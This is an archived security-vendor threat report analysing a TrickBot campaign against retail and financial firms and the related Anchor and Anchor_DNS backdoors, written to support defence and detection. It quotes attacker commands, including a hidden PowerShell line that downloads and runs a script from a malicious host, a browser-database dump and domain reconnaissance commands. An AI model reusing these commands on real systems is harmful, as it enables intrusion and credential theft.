{ "id": "69e124e5-c4b9-447c-b174-6ffde1b80d79", "created_at": "2026-04-06T00:16:37.763447Z", "updated_at": "2026-04-10T03:33:53.538988Z", "deleted_at": null, "sha1_hash": "a2da9ba5a5a893a9823c509fb180b1f98e65b4e2", "title": "Dropping Anchor: From a TrickBot Infection to the Discovery of the Anchor Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6645580, "plain_text": "Dropping Anchor: From a TrickBot Infection to the Discovery of the\r\nAnchor Malware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:48:42 UTC\r\nIntroduction\r\nResearch By: Assaf Dahan, Lior Rochberger, Eli Salem, Mary Zhao, Niv Yona, Omer Yampel and Matt Hart\r\nCybereason Nocturnus is monitoring a new wave of targeted campaigns against financial, manufacturing and retail\r\nbusinesses that began in early October. Similar to attacks previously reported by Cybereason, this campaign started with a\r\nTrickBot infection and progressed into a hacking operation targeting sensitive financial systems.\r\nHowever, unlike previous operations that focused on causing a massive ransomware infection (Ryuk and LockerGoga) by\r\ncompromising critical assets like the domain controller, this new operation is focused on targeting point of sale (PoS)\r\nsystems. The campaign leverages a newly discovered malware family called Anchor exclusively for high-profile targets.\r\nLearn more about additional attacks that leverage TrickBot.\r\nThis research focuses on the following aspects of the TrickBot-Anchor attack:\r\n1. Anatomy of the Attack: A step-by-step anatomy of the attacks, including infection vectors and a dissection of the\r\ntools and techniques used by the attackers.\r\n2. New Malware: The discovery of a new malware family called Anchor, which includes the Anchor_DNS and a\r\nnew, undocumented Anchor that has been operating since August 2018 (and potentially even earlier). The Anchor\r\nmalware is a backdoor used very selectively on high-profile targets, and appears to be tightly connected to TrickBot,\r\npotentially even authored by the same individuals who created TrickBot.\r\nWhile this blog does not discuss attribution explicitly, the nature of these attacks, specifically the motivation, some of the\r\ntools and techniques detailed,  have certain resemblance to past attacks that were linked to the financially-motivated FIN6\r\nthreat actor, a group that is known to target POS systems and has been linked to TrickBot infections in the past.\r\nLastly, our blog emphasizes the gravity and danger that lies in commodity malware infections, as they have the potential of\r\nescalating into a hacking operation. This can easily lead to a disastrous outcome, whether it be a ransomware infection or\r\ntheft of sensitive financial data.\r\nKey Points\r\nThe TrickBot-Anchor Operation: Cybereason Nocturnus is investigating a series of targeted attacks against\r\nfinancial, manufacturing, and retail businesses across the United States and Europe.\r\nTargets POS Systems: The attacks target POS systems to steal sensitive information by taking over critical assets in\r\nthe victims’ network.\r\nDeploys A Backdoor on High-value Targets: On certain high-profile targets, the attackers selectively use a new\r\nvariant of the rare Anchor_DNS tool. Anchor_DNS is a backdoor that uses the DNS protocol to stealthily\r\ncommunicate with C2 servers.\r\nUses a New, Undocumented Malware: In addition to the new Anchor_DNS variant, the attackers use a completely\r\nnew and previously undocumented malware dubbed Anchor. Anchor has been in operation since August 2018 and\r\nappears to be tightly related to TrickBot.\r\nAdds Enhancements to TrickBot: This attack adds a new and enhanced stealing module to TrickBot that focuses on\r\nstealing passwords from various products, including the KeePass password manager.\r\nUses Known Tools for Reconnaissance and Lateral Movement: The majority of the initial interactive hacking\r\noperation uses the known tools Meterpreter, PowerShell Empire, and Cobalt Strike for reconnaissance and lateral\r\nmovement.\r\nAbuses the Trust of Certificate Authorities: Many of the payloads in the attacks are signed binaries, which\r\ndemonstrates the ever-growing trend of signed threats that abuse the trust of certificate authorities to bypass\r\ndetection.\r\nTable of Contents\r\nAnatomy of the Attack: A Step-by-Step Analysis\r\nInfection Vector\r\nFrom TrickBot Infection to Interactive Hacking\r\nMeterpreter \u0026 Cobalt Strike Implants\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 1 of 22\n\nActive Directory Discovery using ADfind\r\nNew Anchor_DNS Variant Discovered\r\nDiscovery of The Anchor Malware and its Connection to TrickBot\r\nRise of Signed Malware\r\nConclusion\r\nIndicators of Compromise\r\nMITRE ATT\u0026CK BREAKDOWN\r\nAnatomy of the Attack: A Step-by-Step Analysis\r\nAn overview of the attack tree, as seen in the Cybereason Defense Platform.\r\nInfection Vector\r\nDownloading and injecting TrickBot.\r\nThe attack starts with a phishing email that contains a malicious link to a file hosted on Google Docs named “Annual Bonus\r\nReport.doc”. When the user clicks on the link, the TrickBot dropper downloads onto the target machine. This differs from\r\nprevious TrickBot attacks we have seen, where TrickBot is usually dropped through a Microsoft Office document or by\r\nanother malware like Emotet.\r\nPhishing email that tricks the user into downloading TrickBot.\r\nThe TrickBot Downloader\r\nThe campaigns use a TrickBot downloader that is signed and uses an icon to pretend it is a Microsoft Word document. When\r\nthe user double-clicks the file, they are presented with a decoy message box. To avoid suspicion, the decoy message\r\nsuggests the user should update Microsoft Word or open the file from another computer.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 2 of 22\n\nTrickBot displays a message box suggests updating Microsoft Word or opening the file on another computer to preview the\r\ndocument.\r\nWhile at first glance these files can be mistaken for legitimate Microsoft Word files, a closer inspection of the file metadata\r\nindicates they are not associated with Microsoft Word, nor are they Microsoft Word document files.\r\nMost of the initial payloads in these campaigns are signed with valid certificates to evade security tools. They abuse the\r\nrelative trust that is given to signed binaries to avoid detection.\r\nFile metadata properties for the fake Microsoft Word Document.\r\nSigned malware is an evasive initial entry point into an organization.\r\nThe message box distracts the user as TrickBot’s payload is downloaded, stored in the %TEMP% folder, and executed. A\r\nnew process injects the TrickBot payload into a svchost.exe process.\r\nsvchost.exe injected code malicious evidence as seen in the Cybereason Platform.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 3 of 22\n\nDomain associated with the TrickBot payload download.\r\nThe TrickBot Payload\r\nOnce TrickBot’s main payload is injected into the svchost.exe process, it carries out a series of reconnaissance-related tasks\r\nto profile the infected endpoint and the network. This information is crucial, as it determines the course of the attack.\r\nChecking Network Connectivity\r\nTrickBot checks for Internet connectivity by trying to access several designated domains. These domains are preconfigured\r\nand belong to legitimate web services, including: checkip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org,\r\nicanhazip.com, myexternalip.com, wtfismyip.com, ip.anysrc.net.\r\nOnce TrickBot verifies it can connect to the Internet, it communicates with C2 servers, some of which using TOR-related\r\ndomains. It collects and sends information about where the target machine is located to the C2 servers.\r\nBrowser History and Credential Theft\r\nAfter TrickBot establishes Internet access and sends information about the location of the target machine, it starts its\r\nmalicious activity. The module core-parser.dll is reflectively loaded into svchost.exe. core-parser.dll parses the TrickBot\r\nconfig files and extracts IP addresses for secondary C2 communication, redirection, and web injection logic.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 4 of 22\n\ncore-parser.dll injected into svchost.dll.\r\nTrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is\r\nresponsible for handling the stolen data.\r\nA list of C2 servers extracted from TrickBot’s configuration.\r\nTrickBot also steals data from Internet Explorer by executing the built-in Windows tool ESENTUTL using the living-off-the-land technique (LOLBin).\r\nesentutl /p /o C:\\Users\\[USER]\\AppData\\Local\\Temp\\grabber_temp.edb\r\nThis command dumps the Extensible Storage Engine (ESE) database format.\r\nApplication-specific Credential Theft\r\nThis variant of TrickBot employs a new, unique ability to steal passwords from KeePass, a free, open- source password\r\nmanager. TrickBot's KeePass stealing capabilities seem to be inspired (or even partially copy-pasted) from a publicly\r\navailable tool dubbed PoshKPBrute, a script that performs a dictionary attack against KeePass .kdbx files. Once it finds the\r\ndictionary key, it dumps all passwords as an output and sends the attackers the master password.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 5 of 22\n\nKeePass stealing brute force tool.\r\nTrickBot’s stealer module also tries to extract keys from Filezilla, OpenSSH and OpenVPN.\r\nTrickBot attempting to steal keys from Filezilla, OpenSSH, and OpenVPN.\r\nReconnaissance Commands\r\nIn addition to several crafted PowerShell commands, the attackers use several legitimate Windows processes to gather\r\ninformation, including nltest.exe, net.exe, ipconfig.exe, whoami.exe, and nslookup.exe. They gather information on:\r\nAll trusted domains, domains, and domain controllers\r\nA list of computers and network devices on the network\r\nThe infected machine user and groups the user belongs to\r\nThe infected machine, including machine name, operating system, workstation domain, and more information\r\nNetwork adapters that have connected to the machine and DNS servers\r\nThe net.exe process tree.\r\nNltest / domain_trusts /all_trusts\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 6 of 22\n\nNet view /all\r\nNltest /domain_trusts\r\nNet view /all /domain\r\nIpconfig /all\r\nNet config workstation\r\nNslookup “-q=srv_kerberos._tcp”\r\n/c “start microsoft-edge:http://127.0.0.1:52715/11984”\r\nReconnaissance commands launched by TrickBot.\r\nThe attacker also uses PowerShell to test DNS entry settings. They use the command -q=srv_kerberos_tcp on the process\r\nnslookup.exe to open an interactive shell. They use the shell to expand their search to other machines on the network by\r\nsearching for things like a list of the domain controllers.\r\nTrickBot testing DNS settings.\r\nWith this in mind, we gather that the attackers goal is to spread within organizations to multiple machines, not just to the\r\ntarget machine.\r\nFrom TrickBot Infection to Interactive Hacking\r\nThe threat actor evaluates information sent back to the C2 server and identifies if they have successfully infected a high-value target. If so, they escalate their efforts by switching to interactive hacking: reconnaissance, credential dumping, lateral\r\nmovement, and in some cases the mass deployment of ransomware across endpoints connected to the domain controller.\r\nPowerShell Payloads\r\nThe threat actor leverages PowerShell to send additional payloads to the target machine. They issue commands to fetch a\r\npayload from a secondary server and, once it’s downloaded, immediately execute it on the target machine through\r\nPowerShell.\r\npowershell.exe -nop -WindowStyle Hidden -executionpolicy bypass -c \"IEX ((new-object\r\nnet.webclient).downloadstring('hxxps://northracing[.]net/?a=irs\u0026x=[base64]'))\"\r\nThe northracing[.]net URL contains a PowerShell script in the contents of the webpage. Though we were unable to fetch the\r\nscript used in this specific incident, we were able to pivot off the query parameters used in the above PowerShell script (?\r\na=irs\u0026x=) to find a sandbox report for similar activity. The PowerShell payload runs two stages: the first stage sends basic\r\ninformation to the C2 domain and waits for a response to see if it should continue its operation. If the threat actor does not\r\nsend a stop flag, the PowerShell script runs in a constant loop and continuously POSTs data to the same domain the payload\r\nwas fetched from. Each POST request is sent along with a UUID generated from the user’s hostname and the current process\r\nID.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 7 of 22\n\nInformation sent along each POST request in the payload.\r\nA POST request containing basic information about the machine is sent, which includes the current user and their domain,\r\nthe root of the file system, and information about the operating system.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 8 of 22\n\nThe PowerShell payloads using WMI to probe for system information.\r\nThis information is sent to the C2 along with the `i` parameter. When a response is received, the payload checks to see if the\r\nresponse matches the value cex01. If it does, the PowerShell script stops executing and kills the task. If the response is any\r\nother value, the script sets a timeout variable based on the response and continues to the main loop.\r\nThis indicates that the attacker is either looking to target specific Windows domains or specific operating system versions.\r\nThe main loop sends a POST request to the server with the `t` parameter, which requests the next commands from the server.\r\nThe main loop that sends a POST request to the server.\r\nEach line in the response from the threat actor contains a Base64-encoded command, which is decoded and then\r\nimmediately executed using PowerShell through the Invoke-Expression (IEX) commandlet. The output of the command is\r\nsent back to the C2 server using a POST request with the “a” parameter.\r\nMeterpreter \u0026 Cobalt Strike Implants\r\nThe attack tree demonstrating the beginning of the hacking operation using Meterpreter.\r\nMeterpreter Implant\r\nThe attackers use a Meterpreter implant to carry out post-exploitation actions. The Cybereason Platform detects both the\r\nshellcode and various Meterpreter DLLs reflectively loaded to memory. The detected DLLs include:\r\nMetsrv.dll: For Meterpreter, where the protocol and extension systems are implemented\r\nExt_server_priv.x86.dll: For privilege escalation\r\nExt_server_stdapi.x86.dll: A metasploit post exploitation module used for reconnaissance\r\nCybereason detects the reflectively loaded malicious modules as a Meterpreter agent and shellcode executed by the\r\nMeterpreter agent.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 9 of 22\n\nExamining the loaded modules shows which Metasploit modules are loaded.\r\nThe Meterpreter agent creates a connection to port 4444 on the external IP address 91.12.89[.]129.\r\nCobalt Strike Implant\r\nUsing Meterpreter, the attackers injected Cobalt Strike and other Metasploit payloads into the rundll32.exe process.\r\nAttackers injecting Cobalt Strike and other Metasploit payloads into the rundll32.exe process.\r\nDetection of Cobalt Strike, Meterpreter, and shellcode execution.\r\nThe attacker uses the following metasploit modules:\r\next_server_extapi.x86.dll: Obtains clipboard data and manipulates and decrypts the NTDS file\r\next_server_priv.x86.dll: Performs privilege escalation\r\nExt_server_stdapi.x86.dll: Performs reconnaissance activity\r\nBypassuac.x64.dll: A post-exploitation module used to bypass User Account Control\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 10 of 22\n\nPost-exploitation modules reflectively loaded to rundll32.exe\r\nThe connection to the external IP address 199.217.115[.]53 on port 8443.\r\nBoth Meterpreter and Cobalt Strike are legitimate penetration testing tools that have been repeatedly used by various threat\r\nactors, including the FIN6 threat actor.\r\nActive Directory Discovery using Cobalt Strike\r\nThe threat actor uses known Cobalt Strike modules to enumerate Active Directory information:\r\nhttps://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Invoke-DACheck.ps1\r\nhttps://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/Initial-LAdminCheck.cna\r\nThe attackers execute several Base64-encoded PowerShell commands in order to determine if the infected machine’s user is\r\nin the admin or domain admin group.\r\nAfter verifying the user is an admin, the threat actor gathers information about the domain controllers and their IP addresses\r\nusing an additional Base64-encoded and compressed PowerShell command.\r\nThe obfuscated and compressed PowerShell command.\r\nThe decoded PowerShell command that attempts to gather domain controller information.\r\nActive Directory Discovery using ADfind\r\nThe attackers deploys a batch script that executes the ADfind.exe tool to enumerate users, groups, and computers of the\r\nWindows domain.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 11 of 22\n\nadfind.exe -f \"(objectcategory=organizationalUnit)\"\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f \"objectcategory=computer\"\r\nadfind.exe -sc trustdmp\r\nadfind.exe -f \"(objectcategory=person)\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f \"(objectcategory=group)\"\r\nThe ADfind tool has reportedly been used previously in attacks related to FIN6.\r\nNew Anchor_DNS Variant Discovered\r\nOne of the most interesting payloads in these attacks is the Anchor_DNS malware, which was originally discovered in\r\nOctober 2019 by NTT Security. It is classified by NTT as a variant of the infamous TrickBot malware, which uses DNS\r\ntunneling to stealthily communicate with C2 servers. Though this variant was first discovered in October 2019, there is\r\nevidence that Anchor_DNS was used as far back as March 2019.\\\r\nOldest Anchor_DNS sample observed, SHA-1: b388243bf5899c99091ac2df13339f141659bbd4\r\nThis new variant acts as a sophisticated, stealthy backdoor that selectively chooses high-profile targets. Anchor_DNS is still\r\nundergoing rapid development cycles with code changes and new feature updates every few weeks.\r\nThis is a new variant of Anchor_DNS that appeared as early as November 2019 and exhibits the following changes in code\r\nand behavior:\r\nNo self-deletion mechanism shown in previous samples\r\nNo internet connectivity checks using legitimate online web services\r\nA built-in capability to check for C2 availability using ICMP (ping)\r\nAdditional partial string encryption and code obfuscation\r\nStatic Analysis Observations\r\nFile name SHA-1\r\nanchorDNS_x64.exe 5f1ad1787106de9725005d8da33d815d0994ee83\r\nanchorDNS_x64.exe contains a PDB path with the name of the malware, Anchor_DNS. This file is the 64-bit version of\r\nAnchor_DNS, however, there were earlier instances of the 32-bit version as well. The project name shows that this is the\r\nfifth version of Anchor_DNS.\r\n`PDB PATH: C:\\simsim\\anchorDNS.v5\\Bin\\x64\\Release\\anchorDNS_x64.pdb\r\nMany strings in the code have typos and grammatical mistakes, further affirming our suspicion that the authors of\r\nAnchor_DNS are not native english speakers.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 12 of 22\n\nMultiple typos and grammatical mistakes in the Anchor_DNS code.\r\nThe threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string\r\nencryption, and by implementing a packer. The following example shows considerable changes in the code of the\r\nWinMain() function between an older variant of Anchor_DNS and the new variant.\r\nAnchor_DNS was able to stay under-the-radar by using specific execution flags. If these command-line arguments are not\r\nsupplied, the Anchor_DNS terminates.\r\n-i flag:\r\ncreates a scheduled task with the following naming convention (e.g “Notepad++ autoupdate#94654”):\r\n[random folder name in %APPDATA%] autoupdate#[random_number]\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 13 of 22\n\nWrites NTFS ADS files ($TASK, $GUID, $FILE)\r\nAlternate Data\r\nStream\r\nADS Contents Decoded Contents\r\nedskype.exe:$FILE QzpcVXNlcnNcdXNlclxBcHBEYXRhXFJvYW1pbmdcU2t5cGVcZWRza3lwZS5leGU= C:\\Users\\user\\AppData\\Roaming\\\r\nedskype.exe:$TASK Tm90ZXBhZCsrIGF1dG91cGRhdGUjOTQ2NTQ Notepad++ autoupdate#94654\r\nedskype.exe:$GUID [BASE64]\r\n/anchor_dns/[COMPUTER_NAM\r\n[clientID]/\r\n-u flag:\r\nNew Variant: executes the malware’s main communication module with the C2\r\nOld Variant:\r\nDrops a copy in %TEMP%\r\nCreates ADS files ($GUID, $FILE)\r\n-s flag: appears only on older versions of Anchor_DNS and runs the program without creating persistence and self-deletes once done.\r\n--log=: expects a file name to write log file in C:\\Users\\[USER]\r\nContents of the debug file created by Anchor_DNS.\r\nC2 Communication\r\nOlder and newer versions of Anchor_DNS communicate over DNS. However, the newer version described here does not\r\ncheck Internet connectivity using legitimate online web services like ipinfo.io, and instead uses a built-in capability to check\r\nfor the server’s availability using the ICMP protocol.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 14 of 22\n\nDetermining C2 server connectivity.\r\nDNS Tunneling\r\nAnchor_DNS communicates with the C2 servers over DNS using DNS Tunneling. With this technique, Anchor_DNS can\r\ntransfer data, receive commands, and download an additional payload, as detailed in NTT Security’s report on an older\r\nAnchor_DNS sample.\r\nBy implementing DNS Tunneling, Anchor_DNS can evade certain security products that might block certain network\r\nprotocols or overlook DNS traffic.\r\nExample of DNS Tunneling traffic generated by Anchor_DNS.\r\nDiscovery of The Anchor Malware and Its Connection to TrickBot\r\nDuring our investigation, we found several unidentified malware samples related to TrickBot infections. The malware is\r\ndubbed Anchor by its authors and has been active since August 2018. Unlike Anchor_DNS, the Anchor malware does not\r\nimplement communication over DNS. However, it does share many behavioral, code, and string similarities with\r\nAnchor_DNS and some similarities to TrickBot.\r\nEarliest Anchor sample observed (SHA-1:3ed09498214d93c9ec14a15286546d242ad58943)\r\nPDB path for the earliest Anchor sample found.\r\nMany Anchor samples have a very low or at times zero detection rate by AV vendors, which could explain the limited\r\nreports about this malware.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 15 of 22\n\nList of Anchor payloads found on VirusTotal with 0/0 detection rate.\r\nThe malware has both x86 and x64 versions and contains an installer component to install the malware.\r\nPayload Name Hash PDB Path\r\nanchorInstaller_x86\r\n3ed09498214d93c9ec14a15286546d242ad58943\r\n4bba60ff11f8b150b004960c658ad74a707ebcea\r\nD:\\MyProjects\\secondWork\\Anchor\\Win32\\Release\\anchorInstaller_x86.pd\r\nC:\\Users\\ProFi\\Desktop\\data\\Win32\\anchorInstaller_x86Code\\anchorInstal\r\nanchorInstaller_x64 e75983b073ff0632e35e237f6622466c2699687c  \r\nAnchor_x86\r\nBd26238fb7d7e16ea79073d882bba00d34dd859c\r\nF3683a0c12154e8bf44d9d942db3eac9e930e7a5\r\n9ebb541dcb24d564448a6f5e00c613b73eba7148\r\nD:\\MyProjects\\secondWork\\Anchor\\Win32\\Release\\Anchor_x86.pdb\r\nC:\\Users\\ProFi\\Desktop\\data\\Win32\\anchorInstaller_x86Code\\Anchor_x86\r\nD:\\Anchor\\Anchor\\Win32\\Release\\Anchor_x86.pdb\r\nAnchor_x64\r\n46c595e580719a4c54f55b4041f81d6e50ab4062\r\ne5dc7c8bfa285b61dda1618f0ade9c256be75d1a\r\nD:\\Anchor\\x64\\Debug\\Anchor_x64.pdb\r\nC:\\[JOB]\\Anchor\\x64\\Release\\Anchor_x64.pdb\r\nThe Anchor payload is delivered by AnchorInstaller AnchorInstaller unpacks the Anchor DLL and drops it in the\r\n%SYSTEMROOT% or %SYSTEMROOT%\\System32 folder. The dropped DLL is loaded by the service netTcpSvc, which\r\nis created by the malware.\r\nAnchor service persistence found in the registry.\r\nNTFS ADS File - Storing the GUID\r\nSimilar to Anchor_DNS, Anchor creates an NTFS ADS file $GUID to store its GUID:\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 16 of 22\n\nAnchor GUID stored as an NTFS ADS.\r\nUnlike Anchor_DNS, which stores the information in Base64, Anchor’s GUID is saved in cleartext.\r\nSelf Deletion\r\nAnchor and older versions of Anchor_DNS implement the exact same self deletion routine using two sets of commands to\r\nensure that the dropper is deleted once the malware was successfully deployed:\r\ncmd.exe /c timeout 1 \u0026\u0026 del C:\\Users\\[USER]\\[SAMPLE_LOCATION]\"\r\ncmd.exe /C PowerShell 'Start-Sleep 5; Remove-Item C:\\Users\\[USER]\\[SAMPLE_LOCATION]'\r\nC2 Communication\r\nSimilar to TrickBot, Anchor tries to establish Internet connectivity and the external IP of the target machine prior to\r\ncommunicating with its C2 servers. It uses the following hardcoded web services to test connectivity:\r\nOnce it has established connectivity, it communicates with a set of hardcoded C2 servers.\r\nCommunication with a set of hardcoded C2 servers.\r\nThe request and response follow the same C2 communication format as TrickBot.\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 17 of 22\n\nThe request and response format for Anchor.\r\nConnecting Anchor / Anchor_DNS to TrickBot\r\nAnchor and Anchor_DNS are both directly linked to TrickBot infections, as they are downloaded by TrickBot as secondary\r\npayloads. There are also several other similarities noted below.\r\nGUID Generation Function\r\nThe GUID generation functions for Anchor_DNS and Anchor seem almost identical to that of the GUID generated by\r\nTrickBot. The GUID follows this pattern:\r\n[Machine_NAME]_[Windows_Version].[Client_ID]\r\nMalware Name GUID\r\nAnchor_DNS /anchor_dns/MACHINE-001_W617601.D4CB942AA18EFF519DCBCAE88A0A99FB/\r\nAnchor /anchor001/jujubox-PC_W617601.6E8516CA48318FB2904E2027B5350B26\r\nTrickbot /mor49/DAVID-PC_W10017134.55C60B5D13499341D72F5A34C632CFD9\r\nExternal IP Check Web Services\r\nBoth Anchor and older versions of Anchor_DNS use a list of hardcoded online web services to determine Internet\r\nconnectivity and check the external IP of the infected machine. The same list is also used by TrickBot:\r\ncheckip.amazonaws.com, ipecho.net, ipinfo.io, api.ipify.org, icanhazip.com, myexternalip.com, wtfismyip.com, and\r\nip.anysrc.net.\r\nIn certain cases, if internet connectivity cannot be reached, Anchor and older versions of Anchor_DNS will delete\r\nthemselves.\r\nShared C2 Infrastructure\r\nTrickBot, Anchor, and Anchor_DNS typically use a separate C2 infrastructure. However, in some instances of this attack,\r\nthere was C2 server overlap between these infrastructures. For example, the IP 23.95.97[.]59, which is hardcoded in an\r\nAnchor sample, has also served Anchor_DNS and TrickBot:\r\nAnchor sample with hardcoded IP (SHA-1: 9ebb541dcb24d564448a6f5e00c613b73eba7148)\r\nConnection to TrickBot\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 18 of 22\n\nThis above IP address was used by TrickBot to download the squlDLL plugin, which includes email harvesting from SQL\r\nservers, screenlocker, and Mimikatz.\r\nConnection to Anchor_DNS\r\nThe same IP resolved to a domain previously used by Anchor_DNS, chishir[.]com.\r\nPassive DNS information of 23.95.97[.]59 , taken from VirusTotal.\r\nComparison Between Anchor Malware Family\r\nThe following table gives a comparison between different malware in the Anchor malware family.\r\nFeatures Anchor Old Anchor_DNS New Anchor_DNS\r\nEarliest Observed Sample  August 2018 May 2019 November 2019\r\nCommand-line arguments?  - + +\r\nSelf-Deletion + + -\r\nNetwork Connectivity check via ICMP - - +\r\nNetwork Connectivity check via web services + + -\r\nNTFS ADS files + + +\r\nTrickBot’s GUID Generation pattern\r\n+\r\n(Cleartext)\r\n+\r\n(base64)\r\n+\r\n(base64)\r\nCode Obfuscation Very Little Very Little Obfuscated Code\r\nC2 Communication Protocols HTTP(S) DNS ICMP, DNS\r\nRise of Signed Malware\r\nCode signing is meant to provide a level of credibility and integrity to a binary from the developer, and to guarantee that the\r\nbinary has not been tampered with. In the past, signing malware was a practice mostly seen with nation-state threat actors.\r\nHowever, this is no longer the case. Nowadays, more and more commodity malware are being signed with valid certificates,\r\neffectively bypassing some security solutions that grant trust to signed binaries.\r\nMalicious files in this attack were signed by:\r\nBiller FIN Oy\r\nNIRMAL 0013 Limited\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 19 of 22\n\nBRO-BURGER, LLC\r\nTrickBot payloads and Anchor / Anchor_DNS payloads were at times signed by the same signer, which further demonstrate\r\nthat these malware are most likely used by the same threat actor.\r\nIn searching for additional signed known and unknown files, we were able to identify dozens of malware samples signed by\r\nthe same organizations. Some were also signed with the same serial number.\r\n1. Biller FIN Oy Signer:\r\nA VirusTotal Signer name search shows malware associated with these campaigns:\r\nA VirusTotal Serial Number search shows malware associated with the campaigns:\r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 20 of 22\n\nConclusion\r\nThis research gives a detailed step-by-step analysis of recent attacks targeting the financial, manufacturing, and retail sectors\r\nacross the United States and Europe. These attacks start with a TrickBot infection and, with high-profile targets, can escalate\r\nto a hacking operation leveraging a new malware, Anchor, and a new variant of Anchor_DNS.\r\nUnlike previously reported TrickBot attacks that resulted in mass ransomware infections, these new attacks focus on stealing\r\nsensitive information from POS systems and other sensitive resources in the victims’ network by compromising critical\r\nassets.\r\nIn addition, Cybereason discovered a previously undocumented malware called Anchor as well as a new variant of the\r\nrecently discovered Anchor_DNS malware. Both Anchor and Anchor_DNS are directly related to TrickBot infections and\r\nhave code similarities, and sometimes also share C2 infrastructure with TrickBot. Anchor_DNS uses various techniques to\r\nkeep itself under-the-radar, such as communication over DNS, and the reliance on specific command-line arguments in order\r\nto run properly. Through these techniques, it is able to evade many security products including certain sandboxes and AV\r\nvendors.\r\nThese attacks stress the danger of commodity malware infections that sometimes may be underestimated due to their\r\nfrequent use and high volume. It is important to note that, in this attack, once an endpoint is infected with TrickBot it is up to\r\nthe attackers to decide their next move. If they identify a high-value target, they can go beyond the traditional information\r\nstealing capabilities of TrickBot and use the target machine as an entry point to other machines on the network.\r\nThis research does not focus on the attribution of these attacks. However, through analysis of the evidence and context\r\npresented in our research, we noticed certain TTP overlaps  with earlier attacks that were attributed  to the financially-motivated FIN6 threat actor. We leave it to our readers to draw their own conclusions on the attribution of these attacks.\r\nLastly, these attacks show how threat actors are shifting toward signed malware more than ever before. As this trend\r\ncontinues to evolve, security practitioners and security vendors must improve the detection of signed malware and re-think\r\nthe trust given to signed binaries in general.\r\nThe best way to defend against an attack like this is to use an iterative security process. Read more in our white paper. \r\nIndicators of Compromise\r\nFor a comprehensive list of indicators of compromise, please see the PDF file for this attack here.\r\nMITRE ATT\u0026CK Techniques\r\nInitial Access Execution Persistence\r\nPrivilege\r\nEscalation\r\nDefense Evasion\r\nCredential\r\nAccess\r\nDiscovery Collection Exfiltration\r\nSpearphishing\r\nLink\r\nUser Execution\r\nScheduled\r\nTask\r\nScheduled\r\nTask Modify Registry\r\nCredentials\r\nfrom Web\r\nBrowsers\r\nQuery\r\nRegistry\r\nClipboard\r\nData\r\nExfiltration\r\nOver\r\nAlternative\r\nProtocol\r\n  Scheduled Task\r\nBrowser\r\nExtensions\r\nBypass User\r\nAccount\r\nControl\r\nCode Signing\r\nBrute\r\nForce\r\nSystem\r\nInformation\r\nDiscovery\r\n   \r\n \r\nExecution\r\nthrough API\r\nProcess\r\nInjection\r\nAccess\r\nToken\r\nManipulation\r\nProcess Injection\r\nPrivate\r\nKeys\r\nPermission\r\nGroups\r\nDiscovery\r\n   \r\n \r\nCommand-Line\r\nInterface\r\n   \r\nDeobfuscate/Decode\r\nFiles or Information\r\nCredential\r\nDumping\r\nAccount\r\nDiscovery\r\n   \r\n  PowerShell    \r\nBypass User\r\nAccount Control\r\n \r\nDomain\r\nTrust\r\nDiscovery\r\n   \r\nhttps://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware\r\nPage 21 of 22\n\nRundll32     Masquerading        \r\n  Scripting    \r\nNTFS File\r\nAttributes\r\n       \r\n \r\nWindows\r\nManagement\r\nInstrumentation\r\n   \r\nAccess Token\r\nManipulation\r\n       \r\n \r\nExecution\r\nthrough\r\nModule Load\r\n             \r\nSource: 